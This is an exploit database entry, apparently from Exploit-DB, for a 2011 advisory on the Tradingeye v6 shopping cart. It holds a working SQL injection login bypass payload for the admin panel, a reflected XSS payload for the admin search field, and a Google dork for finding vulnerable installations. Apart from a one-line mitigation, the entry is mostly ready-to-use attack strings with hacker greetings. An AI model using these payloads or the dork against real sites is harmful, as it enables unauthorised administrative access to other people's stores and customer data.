Tradingeye Multiple Vulnerabilities

vendor:

Tradingeye

by:

Raghavendra Karthik D

8.8

CVSS

HIGH

Authentication Bypass and Reflected XSS

89, 79

CWE

Product Name: Tradingeye

Affected Version From: v6

Affected Version To: v6

Patch Exists: YES

Related CWE: N/A

CPE: tradingeye

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2011

Tradingeye Multiple Vulnerabilities

Attackers can use Authentication Bypass to get into Admin Panel in the site. Reflected XSS Vulnerability in admin panel(search field) Exploit: ">><marquee><h1>XSSed_by_r007k17</h1></marquee>

Mitigation:

Input validation and sanitization, use of prepared statements, and proper authentication and authorization.

Source

Exploit-DB raw data:

# Exploit Title: Tradingeye Multiple Vulnerabilities
# Vendor:  www.tradingeye.com
# Date: 12th july,2011
# Author: $#4d0\/\/[r007k17] a.k.a Raghavendra Karthik D (
http://www.shadowrootkit.wordpress.com)
# Google Dork:  Powered by Tradingeye. 2009 Tradingeye v6 demo
*****************************************************************************************************************************************************************************************
BREIF DESCRIPTION
*****************************
Tradingeye is a fully-featured web standards compliant Shopping Cart & CMS,
built from the ground up with web accessibility and SEO in mind. Tradingeye
is the
 choice of thousands of online retailers who care about accessibility,
usability and most importantly - results.

******************************************************************************************************************************************************************************************

(Auth ByPass) SQLi Vulnerability
***************************************
{DEMO} : http://site.com/adminindex.php

EXPLOIT:
                 Username: ' or 0=0 #
                 Password: ' or 0=0 #
Observe: Attackers can use Authentication Bypass to get into Admin Panel in
the site.

Reflected XSS Vulnerability
********************************
EXPLOIT 2: Reflected XSS Vulnerability in admin panel(search field)

   {Demo}:
http://site.com/user/adminindex.php?action=user.home
    Exploit:  ">><marquee><h1>XSSed_by_r007k17</h1></marquee>

*****************************************************************************************************************************************************************************************
gr33t1ngs to s1d3 effects and my friends@!21/\/ _3lda@!3.14--
*****************************************************************************************************************************************************************************************